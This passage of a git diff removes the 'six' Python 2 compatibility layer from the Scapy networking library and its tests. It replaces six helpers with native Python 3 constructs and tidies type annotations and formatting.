len(res[1]) > 0: msg = "fail %i:" % len(res[1]) print("\r" + ct.fail(msg), end=' ') - for p in res[1]: - print(col(prnfail(p))) + for fail in res[1]: + print(col(prnfail(fail))) print(" " * len(msg), end=' ') if verbose > 1 and not (prn or prnfail): - print("recv:%i fail:%i" % tuple(map(len, res[:2]))) + print("recv:%i fail:%i" % tuple( + map(len, res[:2]) # type: ignore + )) if verbose == 1: if res[0]: os.write(1, b"*") @@ -1099,7 +1100,7 @@ def _run(self, elif isinstance(opened_socket, dict): sniff_sockets.update( (s, label) - for s, label in six.iteritems(opened_socket) + for s, label in opened_socket.items() ) else: sniff_sockets[opened_socket] = "socket0" @@ -1112,7 +1113,7 @@ def _run(self, if isinstance(offline, list) and \ all(isinstance(elt, str) for elt in offline): # List of files - sniff_sockets.update((PcapReader( + sniff_sockets.update((PcapReader( # type: ignore fname if flt is None else tcpdump(fname, args=["-w", "-"], @@ -1122,14 +1123,14 @@ def _run(self, ), fname) for fname in offline) elif isinstance(offline, dict): # Dict of files - sniff_sockets.update((PcapReader( + sniff_sockets.update((PcapReader( # type: ignore fname if flt is None else tcpdump(fname, args=["-w", "-"], flt=flt, getfd=True, quiet=quiet) - ), label) for fname, label in six.iteritems(offline)) + ), label) for fname, label in offline.items()) elif isinstance(offline, (Packet, PacketList, list)): # Iterables (list of packets, PacketList..) offline = IterSocket(offline) @@ -1142,7 +1143,7 @@ def _run(self, )] = offline else: # Other (file descriptors...) - sniff_sockets[PcapReader( + sniff_sockets[PcapReader( # type: ignore offline if flt is None else tcpdump(offline, args=["-w", "-"], @@ -1163,7 +1164,7 @@ def _run(self, sniff_sockets.update( (_RL2(ifname)(type=ETH_P_ALL, iface=ifname, **karg), iflabel) - for ifname, iflabel in six.iteritems(iface) + for ifname, iflabel in iface.items() ) else: iface = iface or conf.iface diff --git a/scapy/sessions.py b/scapy/sessions.py index e4ccb86384c..9eb2ad8c4aa 100644 --- a/scapy/sessions.py +++ b/scapy/sessions.py @@ -296,7 +296,11 @@ def _process_packet(self, pkt): # when a packet ends. return pkt self.data += bytes(pkt) - pkt = pay_class.tcp_reassemble(self.data, self.metadata, self.session) + pkt = pay_class.tcp_reassemble( + self.data, + self.metadata, + self.session + ) if pkt: self.data = b"" self.metadata = {} @@ -351,7 +355,11 @@ def _process_packet(self, pkt): packet = None # type: Optional[Packet] if data.full(): # Reassemble using all previous packets - packet = tcp_reassemble(bytes(data), metadata, tcp_session) + packet = tcp_reassemble( + bytes(data), + metadata, + tcp_session + ) # Stack the result on top of the previous frames if packet: if "seq" in metadata: diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 6be27e3eaef..6f76b44d346 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -20,7 +20,6 @@ from scapy.compat import raw from scapy.error import warning, log_runtime from scapy.interfaces import network_name -import scapy.libs.six as six from scapy.packet import Packet import scapy.packet from scapy.plist import ( @@ -40,13 +39,12 @@ Tuple, Type, cast, - _Generic_metaclass ) # Utils -class _SuperSocket_metaclass(_Generic_metaclass): +class _SuperSocket_metaclass(type): desc = None # type: Optional[str] def __repr__(self): @@ -78,8 +76,7 @@ class tpacket_auxdata(ctypes.Structure): # SuperSocket -@six.add_metaclass(_SuperSocket_metaclass) -class SuperSocket: +class SuperSocket(metaclass=_SuperSocket_metaclass): closed = False # type: bool nonblocking_socket = False # type: bool auxdata_available = False # type: bool @@ -110,7 +107,7 @@ def send(self, x): else: return 0 - if six.PY2 or WINDOWS: + if WINDOWS: def _recv_raw(self, sock, x): # type: (socket.socket, int) -> Tuple[bytes, Any, Optional[float]] """Internal function to receive a Packet""" @@ -303,21 +300,20 @@ def __init__(self, self.ins.bind((iface, type)) else: self.iface = "any" - if not six.PY2: - try: - # Receive Auxiliary Data (VLAN tags) - self.ins.setsockopt(SOL_PACKET, PACKET_AUXDATA, 1) - self.ins.setsockopt( - socket.SOL_SOCKET, - SO_TIMESTAMPNS, - 1 - ) - self.auxdata_available = True - except OSError: - # Note: Auxiliary Data is only supported since - # Linux 2.6.21 - msg = "Your Linux Kernel does not support Auxiliary Data!" - log_runtime.info(msg) + try: + # Receive Auxiliary Data (VLAN tags) + self.ins.setsockopt(SOL_PACKET, PACKET_AUXDATA, 1) + self.ins.setsockopt( + socket.SOL_SOCKET, + SO_TIMESTAMPNS, + 1 + ) + self.auxdata_available = True + except OSError: + # Note: Auxiliary Data is only supported since + # Linux 2.6.21 + msg = "Your Linux Kernel does not support Auxiliary Data!" + log_runtime.info(msg) def recv(self, x=MTU): # type: (int) -> Optional[Packet] @@ -527,7 +523,7 @@ def _iter(obj=cast(SndRcvList, obj)): yield r self.iter = _iter() elif isinstance(obj, (list, PacketList)): - if isinstance(obj[0], bytes): # type: ignore + if isinstance(obj[0], bytes): self.iter = iter(obj) else: self.iter = (y for x in obj for y in x) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index d326b4906b1..da6ca39a2ef 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -6,6 +6,7 @@ """ Unit testing infrastructure for Scapy """ + import builtins import bz2 import copy diff --git a/scapy/tools/automotive/isotpscanner.py b/scapy/tools/automotive/isotpscanner.py index da58f2276dd..37f6626eb18 100755 --- a/scapy/tools/automotive/isotpscanner.py +++ b/scapy/tools/automotive/isotpscanner.py @@ -13,12 +13,11 @@ from ast import literal_eval -import scapy.libs.six as six from scapy.config import conf from scapy.consts import LINUX from scapy.compat import Tuple, Optional, Any -if six.PY2 or not LINUX or conf.use_pypy: +if not LINUX or conf.use_pypy: conf.contribs['CANSocket'] = {'use-python-can': True} from scapy.contrib.cansocket import CANSocket, PYTHON_CAN # noqa: E402 diff --git a/scapy/tools/automotive/obdscanner.py b/scapy/tools/automotive/obdscanner.py index c817069112e..5318fb82bf4 100755 --- a/scapy/tools/automotive/obdscanner.py +++ b/scapy/tools/automotive/obdscanner.py @@ -14,11 +14,10 @@ from ast import literal_eval -import scapy.libs.six as six from scapy.config import conf from scapy.consts import LINUX -if six.PY2 or not LINUX or conf.use_pypy: +if not LINUX or conf.use_pypy: conf.contribs['CANSocket'] = {'use-python-can': True} from scapy.contrib.isotp import ISOTPSocket # noqa: E402 diff --git a/scapy/utils.py b/scapy/utils.py index ae2cf6355f0..6a2ce087934 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -15,10 +15,14 @@ import decimal import difflib import gzip +from io import StringIO +from itertools import zip_longest import locale import os +import pickle import random import re +import shutil import socket import struct import subprocess @@ -28,9 +32,6 @@ import time import warnings -import scapy.libs.six as six -from scapy.libs.six.moves import range, input, zip_longest - from scapy.config import conf from scapy.consts import DARWIN, OPENBSD, WINDOWS from scapy.data import MTU, DLT_EN10MB, DLT_RAW @@ -62,9 +63,6 @@ from scapy.packet import Packet from scapy.plist import _PacketIterable, PacketList from scapy.supersocket import SuperSocket - _SuperSocket = SuperSocket -else: - _SuperSocket = object _ByteStream = Union[IO[bytes], gzip.GzipFile] @@ -255,7 +253,7 @@ def lhex(x): from scapy.volatile import VolatileValue if isinstance(x, VolatileValue): return repr(x) - if isinstance(x, six.integer_types): + if isinstance(x, int): return hex(x) if isinstance(x, tuple): return "(%s)" % ", ".join(lhex(v) for v in x) @@ -991,7 +989,7 @@ class Enum_metaclass(type): def __new__(cls, name, bases, dct): # type: (Any, str, Any, Dict[str, Any]) -> Any rdict = {} - for k, v in six.iteritems(dct): + for k, v in dct.items(): if isinstance(v, int): v = cls.element_class(k, v) dct[k] = v @@ -1024,7 +1022,7 @@ def __repr__(self): def export_object(obj): # type: (Any) -> None import zlib - print(bytes_base64(zlib.compress(six.moves.cPickle.dumps(obj, 2), 9))) + print(bytes_base64(zlib.compress(pickle.dumps(obj, 2), 9))) def import_object(obj=None): @@ -1032,7 +1030,7 @@ def import_object(obj=None): import zlib if obj is None: obj = sys.stdin.read() - return six.moves.cPickle.loads(zlib.decompress(base64_bytes(obj.strip()))) # noqa: E501 + return pickle.loads(zlib.decompress(base64_bytes(obj.strip()))) # noqa: E501 def save_object(fname, obj): @@ -1040,14 +1038,14 @@ def save_object(fname, obj): """Pickle a Python object""" fd = gzip.open(fname, "wb") - six.moves.cPickle.dump(obj, fd) + pickle.dump(obj, fd) fd.close() def load_object(fname): # type: (str) -> Any """unpickle a Python object""" - return six.moves.cPickle.load(gzip.open(fname, "rb")) + return pickle.load(gzip.open(fname, "rb")) @conf.commands.register @@ -1063,7 +1061,7 @@ def corrupt_bytes(data, p=0.01, n=None): n = max(1, int(s_len * p)) for i in random.sample(range(s_len), n): s[i] = (s[i] + random.randint(1, 255)) % 256 - return s.tostring() if six.PY2 else s.tobytes() # type: ignore + return s.tobytes() @conf.commands.register @@ -1079,7 +1077,7 @@ def corrupt_bits(data, p=0.01, n=None): n = max(1, int(s_len * p)) for i in random.sample(range(s_len), n): s[i // 8] ^= 1 << (i % 8) - return s.tostring() if six.PY2 else s.tobytes() # type: ignore + return s.tobytes() ############################# @@ -1166,13 +1164,18 @@ def __new__(cls, name, bases, dct): dct['alternative'].alternative = newcls return newcls - def __call__(cls, filename): # type: ignore + def __call__(cls, filename): # type: (Union[IO[bytes], str]) -> Any """Creates a cls instance, use the `alternative` if that fails. """ - i = cls.__new__(cls, cls.__name__, cls.__bases__, cls.__dict__) + i = cls.__new__( + cls, + cls.__name__, + cls.__bases__, + cls.__dict__ # type: ignore + ) filename, fdesc, magic = cls.open(filename) if not magic: raise Scapy_Exception( @@ -1186,7 +1189,12 @@ def __call__(cls, filename): # type: ignore if "alternative" in cls.__dict__: cls = cls.__dict__["alternative"] - i = cls.__new__(cls, cls.__name__, cls.__bases__, cls.__dict__) + i = cls.__new__( + cls, + cls.__name__, + cls.__bases__, + cls.__dict__ # type: ignore + ) try: i.__init__(filename, fdesc, magic) return i @@ -1215,8 +1223,7 @@ def open(fname # type: Union[IO[bytes], str] return filename, fdesc, magic -@six.add_metaclass(PcapReader_metaclass) -class RawPcapReader: +class RawPcapReader(metaclass=PcapReader_metaclass): """A stateful pcap reader. Each packet is returned as a string""" # TODO: use Generics to properly type the various readers. @@ -1264,20 +1271,16 @@ def __iter__(self): # type: () -> RawPcapReader return self - def next(self): - # type: () -> Packet + def __next__(self): + # type: () -> Tuple[bytes, RawPcapReader.PacketMetadata] """ implement the iterator protocol on a set of packets in a pcap file """ try: - return self._read_packet() # type: ignore + return self._read_packet() except EOFError: raise StopIteration - def __next__(self): - # type: () -> Packet - return self.next() - def _read_packet(self, size=MTU): # type: (int) -> Tuple[bytes, RawPcapReader.PacketMetadata] """return a single packet read from the file as a tuple containing @@ -1354,7 +1357,7 @@ def select(sockets, # type: List[SuperSocket] return sockets -class PcapReader(RawPcapReader, _SuperSocket): +class PcapReader(RawPcapReader): def __init__(self, filename, fdesc=None, magic=None): # type: ignore # type: (str, IO[bytes], bytes) -> None RawPcapReader.__init__(self, filename, fdesc, magic) @@ -1398,11 +1401,11 @@ def read_packet(self, size=MTU): p.wirelen = pkt_info.wirelen return p - def recv(self, size=MTU): + def recv(self, size=MTU): # type: ignore # type: (int) -> Packet return self.read_packet(size=size) - def next(self): + def __next__(self): # type: ignore # type: () -> Packet try: return self.read_packet() @@ -1712,7 +1715,7 @@ def _read_block_dsb(self, block, size): warning("PcapNg: Unknown DSB secrets type (0x%x)!", secrets_type) -class PcapNgReader(RawPcapNgReader, PcapReader, _SuperSocket): +class PcapNgReader(RawPcapNgReader, PcapReader): alternative = PcapReader @@ -1748,7 +1751,7 @@ def read_packet(self, size=MTU): p.comment = comment return p - def recv(self, size=MTU): + def recv(self, size=MTU): # type: ignore # type: (int) -> Packet return self.read_packet() @@ -1780,7 +1783,7 @@ def _get_time(self, # type: (...) -> Tuple[float, int] if hasattr(packet, "time"): if sec is None: - packet_time = packet.time # type: ignore + packet_time = packet.time tmp = int(packet_time) usec = int(round((packet_time - tmp) * (1000000000 if self.nano else 1000000))) @@ -1844,7 +1847,7 @@ def write_packet(self, if wirelen is None: if hasattr(packet, "wirelen"): - wirelen = packet.wirelen # type: ignore + wirelen = packet.wirelen if wirelen is None: wirelen = caplen @@ -2043,7 +2046,7 @@ def _write_packet(self, self.f.write(struct.pack(self.endian + "IIII", int(sec), usec, caplen, wirelen)) - self.f.write(packet) + self.f.write(bytes(packet)) if self.sync: self.f.flush() @@ -2075,7 +2078,7 @@ def _get_time(self, # type: (...) -> Tuple[float, int] if hasattr(packet, "time"): if sec is None: - sec = float(packet.time) # type: ignore + sec = float(packet.time) if usec is None: usec = 0 @@ -2211,7 +2214,7 @@ def _write_block_epb(self, self.f.write(self.build_block(block_type, block_epb, options=comment_opt)) - def _write_packet(self, + def _write_packet(self, # type: ignore packet, # type: bytes sec=None, # type: Optional[float] usec=None, # type: Optional[int] @@ -2264,7 +2267,7 @@ def _get_time(self, # type: (...) -> Tuple[float, int] if hasattr(packet, "time"): if sec is None: - sec = float(packet.time) # type: ignore + sec = float(packet.time) if usec is None: usec = 0 @@ -2284,9 +2287,9 @@ def rderf(filename, count=-1): class ERFEthernetReader_metaclass(PcapReader_metaclass): - def __call__(cls, filename): # type: ignore + def __call__(cls, filename): # type: (Union[IO[bytes], str]) -> Any - i = cls.__new__(cls, cls.__name__, cls.__bases__, cls.__dict__) + i = cls.__new__(cls, cls.__name__, cls.__bases__, cls.__dict__) # type: ignore filename, fdesc = cls.open(filename) try: i.__init__(filename, fdesc) @@ -2296,7 +2299,12 @@ def __call__(cls, filename): # type: ignore if "alternative" in cls.__dict__: cls = cls.__dict__["alternative"] - i = cls.__new__(cls, cls.__name__, cls.__bases__, cls.__dict__) + i = cls.__new__( + cls, + cls.__name__, + cls.__bases__, + cls.__dict__ # type: ignore + ) try: i.__init__(filename, fdesc) return i @@ -2325,8 +2333,8 @@ def open(fname # type: ignore return filename, fdesc -@six.add_metaclass(ERFEthernetReader_metaclass) -class ERFEthernetReader(PcapReader): +class ERFEthernetReader(PcapReader, + metaclass=ERFEthernetReader_metaclass): def __init__(self, filename, fdesc=None): # type: ignore # type: (Union[IO[bytes], str], IO[bytes]) -> None @@ -2375,10 +2383,10 @@ def read_packet(self, size=MTU): # Ethernet has 2 bytes of padding containing `offset` and `pad`. Both # of the fields are disregarded by Endace. - p = s[2:size] + pb = s[2:size] from scapy.layers.l2 import Ether try: - p = Ether(p) + p = Ether(pb) # type: Packet except KeyboardInterrupt: raise except Exception: @@ -2499,7 +2507,7 @@ def import_hexcap(input_string=None): p = "" try: if input_string: - input_function = six.StringIO(input_string).readline + input_function = StringIO(input_string).readline else: input_function = input while True: @@ -2675,7 +2683,7 @@ def tcpdump( "tcpdump is not available" ) prog = [conf.prog.tcpdump] - elif isinstance(prog, six.string_types): + elif isinstance(prog, str): prog = [prog] else: raise ValueError("prog must be a string") @@ -2761,7 +2769,7 @@ def tcpdump( stdout=stdout, stderr=stderr, ) - elif isinstance(pktlist, six.string_types): + elif isinstance(pktlist, str): # file with ContextManagerSubprocess(prog[0], suppress=_suppress): proc = subprocess.Popen( @@ -2770,7 +2778,6 @@ def tcpdump( stderr=stderr, ) elif use_tempfile: - pktlist = cast(Union[IO[bytes], "_PacketIterable"], pktlist) tmpfile = get_temp_file( # type: ignore autoext=".pcap", fd=True @@ -2861,15 +2868,10 @@ def get_terminal_width(): Notice: this will try several methods in order to support as many terminals and OS as possible. """ - # Let's first try using the official API - # (Python 3.3+) - sizex = None # type: Optional[int] - if not six.PY2: - import shutil - sizex = shutil.get_terminal_size(fallback=(0, 0))[0] - if sizex != 0: - return sizex - # Backups / Python 2.7 + sizex = shutil.get_terminal_size(fallback=(0, 0))[0] + if sizex != 0: + return sizex + # Backups if WINDOWS: from ctypes import windll, create_string_buffer # http://code.activestate.com/recipes/440694-determine-size-of-console-window-on-windows/ @@ -2883,25 +2885,24 @@ def get_terminal_width(): # sizey = bottom - top + 1 return sizex return sizex - else: - # We have various methods - # COLUMNS is set on some terminals - try: - sizex = int(os.environ['COLUMNS']) - except Exception: - pass - if sizex: - return sizex - # We can query TIOCGWINSZ - try: - import fcntl - import termios - s = struct.pack('HHHH', 0, 0, 0, 0) - x = fcntl.ioctl(1, termios.TIOCGWINSZ, s) - sizex = struct.unpack('HHHH', x)[1] - except IOError: - pass + # We have various methods + # COLUMNS is set on some terminals + try: + sizex = int(os.environ['COLUMNS']) + except Exception: + pass + if sizex: return sizex + # We can query TIOCGWINSZ + try: + import fcntl + import termios + s = struct.pack('HHHH', 0, 0, 0, 0) + x = fcntl.ioctl(1, termios.TIOCGWINSZ, s) + sizex = struct.unpack('HHHH', x)[1] + except IOError: + pass + return sizex def pretty_list(rtlst, # type: List[Tuple[Union[str, List[str]], ...]] diff --git a/scapy/volatile.py b/scapy/volatile.py index b15daccb803..a89bee2725c 100644 --- a/scapy/volatile.py +++ b/scapy/volatile.py @@ -508,12 +508,12 @@ def __mul__(self, n): return self._fix() * n -class RandString(_RandString[bytes]): +class RandString(_RandString[str]): _DEFAULT_CHARS = (string.ascii_uppercase + string.ascii_lowercase + - string.digits).encode("utf-8") + string.digits) def __init__(self, size=None, chars=_DEFAULT_CHARS): - # type: (Optional[Union[int, RandNum]], bytes) -> None + # type: (Optional[Union[int, RandNum]], str) -> None if size is None: size = RandNumExpo(0.01) self.size = size @@ -533,21 +533,22 @@ def _command_args(self): return ret def _fix(self): - # type: () -> bytes - s = b"" + # type: () -> str + s = "" for _ in range(int(self.size)): - rdm_chr = random.choice(self.chars) - s += rdm_chr if isinstance(rdm_chr, str) else chb(rdm_chr) + s += random.choice(self.chars) return s -class RandBin(RandString): - def __init__(self, size=None): - # type: (Optional[Union[int, RandNum]]) -> None - super(RandBin, self).__init__( - size=size, - chars=b"".join(chb(c) for c in range(256)) - ) +class RandBin(_RandString[bytes]): + _DEFAULT_CHARS = b"".join(chb(c) for c in range(256)) + + def __init__(self, size=None, chars=_DEFAULT_CHARS): + # type: (Optional[Union[int, RandNum]], bytes) -> None + if size is None: + size = RandNumExpo(0.01) + self.size = size + self.chars = chars def _command_args(self): # type: () -> str @@ -560,6 +561,13 @@ def _command_args(self): return "" return "size=%r" % self.size.command() + def _fix(self): + # type: () -> bytes + s = b"" + for _ in range(int(self.size)): + s += struct.pack("!B", random.choice(self.chars)) + return s + class RandTermString(RandBin): def __init__(self, size, term): @@ -1189,7 +1197,7 @@ def __init__(self, else: # Invalid template raise ValueError("UUID template is invalid") - rnd_f = [RandInt] + [RandShort] * 2 + [RandByte] * 8 # type: ignore # noqa: E501 + rnd_f = [RandInt] + [RandShort] * 2 + [RandByte] * 8 uuid_template = [] # type: List[Union[int, RandNum]] for i, t in enumerate(template): if t == "*": diff --git a/test/contrib/automotive/interface_mockup.py b/test/contrib/automotive/interface_mockup.py index 81368f2655e..1e7b2388afd 100644 --- a/test/contrib/automotive/interface_mockup.py +++ b/test/contrib/automotive/interface_mockup.py @@ -15,7 +15,6 @@ from scapy.main import load_layer, load_contrib from scapy.config import conf from scapy.error import log_runtime, Scapy_Exception -import scapy.libs.six as six from scapy.consts import LINUX load_layer("can", globals_dict=globals()) @@ -73,21 +72,12 @@ def test_and_setup_socket_can(iface_name): # """ Define helper functions for CANSocket creation on all platforms """ # ############################################################################ if _socket_can_support: - if six.PY3: - from scapy.contrib.cansocket_native import * # noqa: F403 - new_can_socket = NativeCANSocket - new_can_socket0 = lambda: NativeCANSocket(iface0) - new_can_socket1 = lambda: NativeCANSocket(iface1) - can_socket_string_list = ["-c", iface0] - sys.__stderr__.write("Using NativeCANSocket\n") - - else: - from scapy.contrib.cansocket_python_can import * # noqa: F403 - new_can_socket = lambda iface: PythonCANSocket(bustype='socketcan', channel=iface, timeout=0.01) # noqa: E501 - new_can_socket0 = lambda: PythonCANSocket(bustype='socketcan', channel=iface0, timeout=0.01) # noqa: E501 - new_can_socket1 = lambda: PythonCANSocket(bustype='socketcan', channel=iface1, timeout=0.01) # noqa: E501 - can_socket_string_list = ["-i", "socketcan", "-c", iface0] - sys.__stderr__.write("Using PythonCANSocket socketcan\n") + from scapy.contrib.cansocket_native import * # noqa: F403 + new_can_socket = NativeCANSocket + new_can_socket0 = lambda: NativeCANSocket(iface0) + new_can_socket1 = lambda: NativeCANSocket(iface1) + can_socket_string_list = ["-c", iface0] + sys.__stderr__.write("Using NativeCANSocket\n") else: from scapy.contrib.cansocket_python_can import * # noqa: F403 @@ -171,7 +161,7 @@ def exit_if_no_isotp_module(): # ############################################################################ # """ Evaluate if ISOTP kernel module is installed and available """ # ############################################################################ -if LINUX and _root and six.PY3 and _socket_can_support: +if LINUX and _root and _socket_can_support: p1 = subprocess.Popen(['lsmod'], stdout=subprocess.PIPE) p2 = subprocess.Popen(['grep', '^can_isotp'], stdout=subprocess.PIPE, stdin=p1.stdout) @@ -192,14 +182,13 @@ def exit_if_no_isotp_module(): # ############################################################################ # """ reload ISOTP kernel module in case configuration changed """ # ############################################################################ -if six.PY3: - import importlib - if "scapy.contrib.isotp" in sys.modules: - importlib.reload(scapy.contrib.isotp) # type: ignore # noqa: F405 +import importlib +if "scapy.contrib.isotp" in sys.modules: + importlib.reload(scapy.contrib.isotp) # type: ignore # noqa: F405 load_contrib("isotp", globals_dict=globals()) -if six.PY3 and ISOTP_KERNEL_MODULE_AVAILABLE: +if ISOTP_KERNEL_MODULE_AVAILABLE: if ISOTPSocket is not ISOTPNativeSocket: # type: ignore raise Scapy_Exception("Error in ISOTPSocket import!") else: diff --git a/test/contrib/automotive/scanner/enumerator.uts b/test/contrib/automotive/scanner/enumerator.uts index 9ebec7f8f0e..6e9eb198eb9 100644 --- a/test/contrib/automotive/scanner/enumerator.uts +++ b/test/contrib/automotive/scanner/enumerator.uts @@ -188,7 +188,7 @@ assert e._retry_pkt[EcuState(session=1)] = ServiceEnumerator execute -from scapy.libs.six.moves.queue import Queue +from queue import Queue from scapy.supersocket import SuperSocket class MockISOTPSocket(SuperSocket): @@ -992,7 +992,7 @@ class MyTestCase1(AutomotiveTestCase): _description = "MyTestCase1" _supported_kwargs = copy.copy(AutomotiveTestCase._supported_kwargs) _supported_kwargs.update({ - 'stop_event': (threading._Event if six.PY2 else threading.Event, None), # type: ignore # noqa: E501 + 'stop_event': (threading.Event, None), # type: ignore }) @property def supported_responses(self): @@ -1005,7 +1005,7 @@ class MyTestCase2(AutomotiveTestCase): _description = "MyTestCase2" _supported_kwargs = copy.copy(AutomotiveTestCase._supported_kwargs) _supported_kwargs.update({ - 'stop_event': (threading._Event if six.PY2 else threading.Event, None), # type: ignore # noqa: E501 + 'stop_event': (threading.Event, None), # type: ignore }) @property def supported_responses(self): diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index e354e0c67b1..5914b17cdc0 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -74,7 +74,7 @@ def executeScannerInVirtualEnvironment(supported_responses, enumerators, unstabl cleanup_testsockets() tester_obj_pipe.close() ecu_obj_pipe.close() - if six.PY3 and LINUX: + if LINUX: pickle_test(scanner) return scanner diff --git a/test/contrib/isotp_message_builder.uts b/test/contrib/isotp_message_builder.uts index 12a5a86e167..8856f88f50c 100644 --- a/test/contrib/isotp_message_builder.uts +++ b/test/contrib/isotp_message_builder.uts @@ -6,10 +6,7 @@ = Definition of utility functions # hexadecimal to bytes convenience function -if six.PY2: - dhex = lambda s: "".join(s.split()).decode('hex') -else: - dhex = bytes.fromhex +dhex = bytes.fromhex = Import isotp diff --git a/test/contrib/isotp_native_socket.uts b/test/contrib/isotp_native_socket.uts index e41bf24ee3c..4a61c2e41b1 100644 --- a/test/contrib/isotp_native_socket.uts +++ b/test/contrib/isotp_native_socket.uts @@ -12,10 +12,7 @@ with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: = Definition of constants, utility functions and mock classes # hexadecimal to bytes convenience function -if six.PY2: - dhex = lambda s: "".join(s.split()).decode('hex') -else: - dhex = bytes.fromhex +dhex = bytes.fromhex + Compatibility with can-isotp linux kernel modules diff --git a/test/contrib/isotp_packet.uts b/test/contrib/isotp_packet.uts index 5dda1af485f..ca490ed1b58 100644 --- a/test/contrib/isotp_packet.uts +++ b/test/contrib/isotp_packet.uts @@ -14,10 +14,7 @@ from scapy.contrib.isotp.isotp_scanner import get_isotp_packet = Define helpers # hexadecimal to bytes convenience function -if six.PY2: - dhex = lambda s: "".join(s.split()).decode('hex') -else: - dhex = bytes.fromhex +dhex = bytes.fromhex + ISOTP packet check diff --git a/test/contrib/isotp_soft_socket.uts b/test/contrib/isotp_soft_socket.uts index f8db678152c..d60fc371927 100644 --- a/test/contrib/isotp_soft_socket.uts +++ b/test/contrib/isotp_soft_socket.uts @@ -7,7 +7,6 @@ = Imports import time from io import BytesIO -import scapy.libs.six as six from scapy.layers.can import * from scapy.contrib.isotp import * from scapy.contrib.isotp.isotp_soft_socket import TimeoutScheduler @@ -30,10 +29,7 @@ log_isotp.addHandler(handler) = Definition of utility functions # hexadecimal to bytes convenience function -if six.PY2: - dhex = lambda s: "".join(s.split()).decode('hex') -else: - dhex = bytes.fromhex +dhex = bytes.fromhex + Test sniffer diff --git a/test/contrib/pfcp.uts b/test/contrib/pfcp.uts index ec6a7100576..df2d581b2b6 100644 --- a/test/contrib/pfcp.uts +++ b/test/contrib/pfcp.uts @@ -32,7 +32,7 @@ for name, cls in pfcp_mod.__dict__.items(): def command(pkt): f = [] - for fn, fv in sorted(six.iteritems(pkt.fields), key=lambda item: item[0]): + for fn, fv in sorted(pkt.fields.items(), key=lambda item: item[0]): if fn in ("length", "message_type"): continue if fn == "ietype" and not isinstance(pkt, IE_EnterpriseSpecific) and \ diff --git a/test/contrib/pnio_rpc.uts b/test/contrib/pnio_rpc.uts index 444768f94c5..62e433d534e 100644 --- a/test/contrib/pnio_rpc.uts +++ b/test/contrib/pnio_rpc.uts @@ -5,11 +5,10 @@ from scapy.layers.dcerpc import * from scapy.contrib.pnio import * from scapy.contrib.pnio_rpc import * -from scapy.libs.six import itervalues = Check that we have UUIDs -for v in itervalues(RPC_INTERFACE_UUID): +for v in RPC_INTERFACE_UUID.values(): assert isinstance(v, UUID) + Check Block diff --git a/test/fields.uts b/test/fields.uts index 6c62a7dfacf..4e2ba690e3b 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -882,16 +882,16 @@ f = MultiFlagsField('flags', set(), 3, { mp = MockPacket(0) x = f.i2m(mp, set()) -assert isinstance(x, six.integer_types) +assert isinstance(x, int) assert x == 0 x = f.i2m(mp, {'A'}) -assert isinstance(x, six.integer_types) +assert isinstance(x, int) assert x == 1 x = f.i2m(mp, {'A', 'B'}) -assert isinstance(x, six.integer_types) +assert isinstance(x, int) assert x == 3 x = f.i2m(mp, {'A', 'B', 'bit 2'}) -assert isinstance(x, six.integer_types) +assert isinstance(x, int) assert x == 7 try: x = f.i2m(mp, {'+'}) diff --git a/test/linux.uts b/test/linux.uts index 67d0d7ba3dd..9a08e5ff145 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -292,17 +292,17 @@ test_read_routes() ~ linux needs_root from scapy.arch.linux import L3PacketSocket -import scapy.libs.six as six - -if six.PY3: - import mock, socket - @mock.patch("scapy.arch.linux.socket.socket.sendto") - def test_L3PacketSocket_sendto_python3(mock_sendto): - mock_sendto.side_effect = OSError(22, 2807) - l3ps = L3PacketSocket() - l3ps.send(IP(dst="8.8.8.8")/ICMP()) - return True - assert test_L3PacketSocket_sendto_python3() + +import mock, socket + +@mock.patch("scapy.arch.linux.socket.socket.sendto") +def test_L3PacketSocket_sendto_python3(mock_sendto): + mock_sendto.side_effect = OSError(22, 2807) + l3ps = L3PacketSocket() + l3ps.send(IP(dst="8.8.8.8")/ICMP()) + return True + +assert test_L3PacketSocket_sendto_python3() = Test _interface_selection ~ netaccess linux needs_root diff --git a/test/random.uts b/test/random.uts index f2cd30bd169..c0cec76c5f0 100644 --- a/test/random.uts +++ b/test/random.uts @@ -7,34 +7,33 @@ = RandomEnumeration ren = RandomEnumeration(0, 7, seed=0x2807, forever=False) -[x for x in ren] == ([3, 4, 2, 5, 1, 6, 0, 7] if six.PY2 else [5, 0, 2, 7, 6, 3, 1, 4]) +[x for x in ren] == [5, 0, 2, 7, 6, 3, 1, 4] = RandIP6 random.seed(0x2807) r6 = RandIP6() -assert(r6 == ("d279:1205:e445:5a9f:db28:efc9:afd7:f594" if six.PY2 else - "240b:238f:b53f:b727:d0f9:bfc4:2007:e265")) +assert r6 == "240b:238f:b53f:b727:d0f9:bfc4:2007:e265" assert r6.command() == "RandIP6()" random.seed(0x2807) r6 = RandIP6("2001:db8::-") -assert r6 == ("2001:0db8::e445" if six.PY2 else "2001:0db8::b53f") +assert r6 == "2001:0db8::b53f" assert r6.command() == "RandIP6(ip6template='2001:db8::-')" r6 = RandIP6("2001:db8::*") -assert r6 == ("2001:0db8::efc9" if six.PY2 else "2001:0db8::bfc4") +assert r6 == "2001:0db8::bfc4" assert r6.command() == "RandIP6(ip6template='2001:db8::*')" = RandMAC random.seed(0x2807) rm = RandMAC() -assert rm == ("d2:12:e4:5a:db:ef" if six.PY2 else "24:23:b5:b7:d0:bf") +assert rm == "24:23:b5:b7:d0:bf" assert rm.command() == "RandMAC()" rm = RandMAC("00:01:02:03:04:0-7") -assert rm == ("00:01:02:03:04:05" if six.PY2 else "00:01:02:03:04:01") +assert rm == "00:01:02:03:04:01" assert rm.command() == "RandMAC(template='00:01:02:03:04:0-7')" @@ -50,7 +49,7 @@ assert rand_obj == "1.2.3.41" assert rand_obj.command() == "RandOID(fmt='1.2.3.*')" rand_obj = RandOID("1.2.3.0-28") -assert rand_obj == ("1.2.3.11" if six.PY2 else "1.2.3.12") +assert rand_obj == "1.2.3.12" assert 